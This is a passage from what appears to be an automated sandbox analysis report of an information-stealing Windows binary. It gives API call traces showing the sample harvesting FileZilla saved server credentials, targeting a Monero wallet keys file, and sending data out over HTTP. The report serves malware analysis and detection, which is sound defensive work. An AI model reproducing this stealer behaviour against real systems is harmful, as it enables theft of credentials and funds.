                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 65cc3a3481a781b563bf4ebafcceed9c458866a5a19d63737b1ec8d979265ff7
                          • Instruction ID: 111d33414f7871fb70e38e5d5a8bb4739d1ed412e2a41e65f4aa943e5e77e171
                          • Opcode Fuzzy Hash: 65cc3a3481a781b563bf4ebafcceed9c458866a5a19d63737b1ec8d979265ff7
                          • Instruction Fuzzy Hash: 304149F3A085109FF704AE2DDC5577AB7DAEFD4320F16853DEA88D3744E93958028295
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d5d96600435933306ca0660c12775a18cc67add7a2d16c1c90b04af6f41ff3a8
                          • Instruction ID: 1e862498231f34bbb584393b8f642ec1f394013d078d97db1a8f36dffb2358ec
                          • Opcode Fuzzy Hash: d5d96600435933306ca0660c12775a18cc67add7a2d16c1c90b04af6f41ff3a8
                          • Instruction Fuzzy Hash: E1419EB250D201DFD304BE28DD8563AB7E9FF84710F228D2DE6C287344EA3969449B87
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e3d9596f30efbe92f2e1bf6426edc8443427da3519ae9b7a1aea8a5eeb087ad7
                          • Instruction ID: 28794e6033b28b67fd1b5dabe5ad2f3ab5c9d31c88b77c3cb476c6face8b8a30
                          • Opcode Fuzzy Hash: e3d9596f30efbe92f2e1bf6426edc8443427da3519ae9b7a1aea8a5eeb087ad7
                          • Instruction Fuzzy Hash: AA4112F3E142108BE3046E7DDC9976ABAD4EF64220F0A053DEEC9CB744E56A6D04C382
                          Memory Dump Source
                          • Source File: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 52345dc785ef9367e9b354f586e9d1221769aafc7f2a759b2f967b30be0d4055
                          • Instruction ID: bc852ae46bd1fa54b94a2f95e95b46f9b059e52f36fa01fdcd25705a0f42b7d0
                          • Opcode Fuzzy Hash: 52345dc785ef9367e9b354f586e9d1221769aafc7f2a759b2f967b30be0d4055
                          • Instruction Fuzzy Hash: B721A1B3A0C7049FE3516A09DC817AEF7EAEFD8724F16492DE7C483744EA3558108697
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction ID: abbdd297b848902a35704da264ecc4a7d2e6ec457c67c65f9fa5c7ab4ebdfac4
                          • Opcode Fuzzy Hash: eecc59efbe9cdf3acfc8abb57b86a9aab05cbe8bc62256deaf8fcc3308cb31aa
                          • Instruction Fuzzy Hash: 1EE04878A56608EFC740CF88D584E49B7F8EB0D720F1181D5ED099B721D235EE00EA90
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 00558DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00558E0B
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 005499EC
                            • Part of subcall function 005499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00549A11
                            • Part of subcall function 005499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00549A31
                            • Part of subcall function 005499C0: ReadFile.KERNEL32(000000FF,?,00000000,0054148F,00000000), ref: 00549A5A
                            • Part of subcall function 005499C0: LocalFree.KERNEL32(0054148F), ref: 00549A90
                            • Part of subcall function 005499C0: CloseHandle.KERNEL32(000000FF), ref: 00549A9A
                            • Part of subcall function 00558E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00558E52
                          • GetProcessHeap.KERNEL32(00000000,000F423F,00560DBA,00560DB7,00560DB6,00560DB3), ref: 00550362
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00550369
                          • StrStrA.SHLWAPI(00000000,<Host>), ref: 00550385
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550393
                          • StrStrA.SHLWAPI(00000000,<Port>), ref: 005503CF
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 005503DD
                          • StrStrA.SHLWAPI(00000000,<User>), ref: 00550419
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550427
                          • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00550463
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550475
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550502
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055051A
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 00550532
                          • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055054A
                          • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00550562
                          • lstrcat.KERNEL32(?,profile: null), ref: 00550571
                          • lstrcat.KERNEL32(?,url: ), ref: 00550580
                          • lstrcat.KERNEL32(?,00000000), ref: 00550593
                          • lstrcat.KERNEL32(?,00561678), ref: 005505A2
                          • lstrcat.KERNEL32(?,00000000), ref: 005505B5
                          • lstrcat.KERNEL32(?,0056167C), ref: 005505C4
                          • lstrcat.KERNEL32(?,login: ), ref: 005505D3
                          • lstrcat.KERNEL32(?,00000000), ref: 005505E6
                          • lstrcat.KERNEL32(?,00561688), ref: 005505F5
                          • lstrcat.KERNEL32(?,password: ), ref: 00550604
                          • lstrcat.KERNEL32(?,00000000), ref: 00550617
                          • lstrcat.KERNEL32(?,00561698), ref: 00550626
                          • lstrcat.KERNEL32(?,0056169C), ref: 00550635
                          • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00560DB2), ref: 0055068E
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                          • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                          • API String ID: 1942843190-555421843
                          • Opcode ID: cdcdd33828fab86723c7e09afa018945fbe7f6a277ce3f7366ce6328c3f1e469
                          • Instruction ID: 890e5a60138b8e5338ae85872fe00a0b76b981c7d16d9b34eefc3570d746bd86
                          • Opcode Fuzzy Hash: cdcdd33828fab86723c7e09afa018945fbe7f6a277ce3f7366ce6328c3f1e469
                          • Instruction Fuzzy Hash: EAD14271900109ABDB04EBF0DDAAEEE7B38FF54301F54851AF502A7091EF34AA49CB65
                          APIs
                            • Part of subcall function 0055A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0055A7E6
                            • Part of subcall function 005447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00544839
                            • Part of subcall function 005447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00544849
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                          • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 005459F8
                          • StrCmpCA.SHLWAPI(?,0123FBD0), ref: 00545A13
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00545B93
                          • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,0123FBB0,00000000,?,0123EB90,00000000,?,00561A1C), ref: 00545E71
                          • lstrlen.KERNEL32(00000000), ref: 00545E82
                          • GetProcessHeap.KERNEL32(00000000,?), ref: 00545E93
                          • RtlAllocateHeap.NTDLL(00000000), ref: 00545E9A
                          • lstrlen.KERNEL32(00000000), ref: 00545EAF
                          • lstrlen.KERNEL32(00000000), ref: 00545ED8
                          • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00545EF1
                          • lstrlen.KERNEL32(00000000,?,?), ref: 00545F1B
                          • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00545F2F
                          • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00545F4C
                          • InternetCloseHandle.WININET(00000000), ref: 00545FB0
                          • InternetCloseHandle.WININET(00000000), ref: 00545FBD
                          • HttpOpenRequestA.WININET(00000000,0123FBA0,?,0123F440,00000000,00000000,00400100,00000000), ref: 00545BF8
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • InternetCloseHandle.WININET(00000000), ref: 00545FC7
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                          • String ID: "$"$------$------$------
                          • API String ID: 874700897-2180234286
                          • Opcode ID: 364312af18cfc9d8c02ab992dc7c4a670fc8647b2d3c77404be13a2df158a0c7
                          • Instruction ID: 576a66b24f421bdad34500e5946d568f2396901b682ff4d32fd6d4e799cf3282
                          • Opcode Fuzzy Hash: 364312af18cfc9d8c02ab992dc7c4a670fc8647b2d3c77404be13a2df158a0c7
                          • Instruction Fuzzy Hash: 61122172820119ABDB15EBA0DCA9FEE7778BF54701F50429AB50663091EF303A4DCF65
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 00558B60: GetSystemTime.KERNEL32(00560E1A,0123ED70,005605AE,?,?,005413F9,?,0000001A,00560E1A,00000000,?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 00558B86
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0054CF83
                          • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0054D0C7
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0054D0CE
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D208
                          • lstrcat.KERNEL32(?,00561478), ref: 0054D217
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D22A
                          • lstrcat.KERNEL32(?,0056147C), ref: 0054D239
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D24C
                          • lstrcat.KERNEL32(?,00561480), ref: 0054D25B
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D26E
                          • lstrcat.KERNEL32(?,00561484), ref: 0054D27D
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D290
                          • lstrcat.KERNEL32(?,00561488), ref: 0054D29F
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D2B2
                          • lstrcat.KERNEL32(?,0056148C), ref: 0054D2C1
                          • lstrcat.KERNEL32(?,00000000), ref: 0054D2D4
                          • lstrcat.KERNEL32(?,00561490), ref: 0054D2E3
                            • Part of subcall function 0055A820: lstrlen.KERNEL32(00544F05,?,?,00544F05,00560DDE), ref: 0055A82B
                            • Part of subcall function 0055A820: lstrcpy.KERNEL32(00560DDE,00000000), ref: 0055A885
                          • lstrlen.KERNEL32(?), ref: 0054D32A
                          • lstrlen.KERNEL32(?), ref: 0054D339
                            • Part of subcall function 0055AA70: StrCmpCA.SHLWAPI(01238A28,0054A7A7,?,0054A7A7,01238A28), ref: 0055AA8F
                          • DeleteFileA.KERNEL32(00000000), ref: 0054D3B4
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.0000000000622000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.000000000078A000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.000000000079E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000922000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A03000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A28000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A32000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223015706.0000000000A41000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223383200.0000000000A42000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223530596.0000000000BE0000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2223553383.0000000000BE1000.00000080.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_540000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                          • String ID:
                          • API String ID: 1956182324-0
                          • Opcode ID: 913d59dd0123ea124f5414c45ce55d2c5fa801dfbc73187db5d70cdb5e736a6f
                          • Instruction ID: 6b8428b5d8aa108d6fe87c03d98435a5346747ff321f5be4ce3f373d94451a13
                          • Opcode Fuzzy Hash: 913d59dd0123ea124f5414c45ce55d2c5fa801dfbc73187db5d70cdb5e736a6f
                          • Instruction Fuzzy Hash: 92E15571950109ABDB04EBA0DD69EEE7B78BF54302F104156F507A7091EE38BE09CB76
                          APIs
                            • Part of subcall function 0055A740: lstrcpy.KERNEL32(00560E17,00000000), ref: 0055A788
                            • Part of subcall function 0055A920: lstrcpy.KERNEL32(00000000,?), ref: 0055A972
                            • Part of subcall function 0055A920: lstrcat.KERNEL32(00000000), ref: 0055A982
                            • Part of subcall function 0055A8A0: lstrcpy.KERNEL32(?,00560E17), ref: 0055A905
                            • Part of subcall function 0055A9B0: lstrlen.KERNEL32(?,01238C68,?,\Monero\wallet.keys,00560E17), ref: 0055A9C5
                            • Part of subcall function 0055A9B0: lstrcpy.KERNEL32(00000000), ref: 0055AA04
                            • Part of subcall function 0055A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0055AA12
                          • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,0123D9D0,00000000,?,0056144C,00000000,?,?), ref: 0054CA6C
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0054CA89
                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0054CA95
                          • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0054CAA8
                          • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0054CAD9
                          • StrStrA.SHLWAPI(?,0123D8C8,00560B52), ref: 0054CAF7
                          • StrStrA.SHLWAPI(00000000,0123D8E0), ref: 0054CB1E
                          • StrStrA.SHLWAPI(?,0123E5E8,00000000,?,00561458,00000000,?,00000000,00000000,?,01238948,00000000,?,00561454,00000000,?), ref: 0054CCA2
                          • StrStrA.SHLWAPI(00000000,0123E3C8), ref: 0054CCB9
                            • Part of subcall function 0054C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0054C871
                            • Part of subcall function 0054C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0054C87C
                          • StrStrA.SHLWAPI(?,0123E3C8,00000000,?,0056145C,00000000,?,00000000,01238A68), ref: 0054CD5A
                          • StrStrA.SHLWAPI(00000000,01238B58), ref: 0054CD71
                            • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B46), ref: 0054C943
                            • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B47), ref: 0054C957
                            • Part of subcall function 0054C820: lstrcat.KERNEL32(?,00560B4E), ref: 0054C978
                          • lstrlen.KERNEL32(00000000), ref: 0054CE44
                          • CloseHandle.KERNEL32(00000000), ref: 0054CE9C
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2222768064.0000000000541000.00000040.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                          • Associated: 00000000.00000002.2222709605.0000000000540000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005F1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2222768064.00000000005FD000.00000040.00000001.01000000.00000003.sdmp
